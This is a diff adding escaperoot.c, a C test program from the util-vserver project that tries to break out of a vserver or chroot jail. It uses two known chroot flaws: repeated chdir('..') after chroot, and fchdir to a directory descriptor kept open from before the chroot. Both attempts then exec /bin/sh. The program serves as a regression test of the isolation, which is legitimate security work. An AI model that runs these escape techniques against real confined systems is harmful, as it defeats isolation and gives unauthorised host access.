--- /dev/null
+// $Id: escaperoot.c,v 1.3 2004/01/13 14:56:26 ensc Exp $
+
+// Copyright (C) 2003 Enrico Scholz <enrico.scholz@informatik.tu-chemnitz.de>
+// based on tests/escaperoot.cc by Jacques Gelinas
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation; either version 2, or (at your option)
+// any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program; if not, write to the Free Software
+// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
+
+/*
+ This program tries to escape out of a vserver using chroot flaws.
+ Once escaped, it exec a shell.
+
+ None of this works on 2.4.13.
+*/
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <wait.h>
+#include <limits.h>
+
+static void print_pwd()
+{
+ char path[PATH_MAX];
+ if (getcwd(path,sizeof(path)-1)!=NULL){
+ printf ("PWD: %s\n",path);
+ }
+}
+/*
+ Just set a chroot in a sub-directory and keep the
+ current directory behind
+*/
+static void test1()
+{
+ printf ("test1\n");
+ print_pwd();
+ mkdir ("dummy_dir",0755);
+ if (chroot ("dummy_dir")==-1){
+ fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
+ }else{
+ int i;
+ // Try to chdir into the real root
+ for (i=0; i<1000; i++) chdir("..");
+ print_pwd();
+ if (execl ("/bin/sh","/bin/sh",NULL)==-1){
+ fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
+ }
+ }
+}
+
+/*
+ Same as test1, except we open the current directory and do
+ a fchdir() to it before trying to escape to the real root.
+*/
+static void test2()
+{
+ int fd;
+
+ printf ("test2\n");
+ print_pwd();
+ mkdir ("dummy_dir",0755);
+ fd = open (".",O_RDONLY);
+ if (fd == -1){
+ fprintf (stderr,"Can't open current directory (%s)\n",strerror(errno));
+ }else if (chroot ("dummy_dir")==-1){
+ fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
+ }else if (fchdir(fd)==-1){
+ fprintf (stderr,"Can't fchdir to the current directory (%s)\n"
+ ,strerror(errno));
+ }else{
+ int i;
+ // Try to chdir into the real root
+ for (i=0; i<1000; i++) chdir("..");
+ print_pwd();
+ if (execl ("/bin/sh","/bin/sh",NULL)==-1){
+ fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
+ }
+ }
+}
+
+/*
+ Perform the test in a sub-process so it won't affect the current one
+*/
+static void dotest (void (*f)())
+{
+ pid_t pid = fork();
+ if (pid == 0){
+ f();
+ _exit (0);
+ }else if (pid == -1){
+ fprintf (stderr,"Can't fork (%s)\n",strerror(errno));
+ }else{
+ int status;
+ wait (&status);
+ }
+}
+
+int main ()
+{
+ dotest (test1);
+ dotest (test2);
+ printf ("All attempts failed\n");
+ return 0;
+}
+
+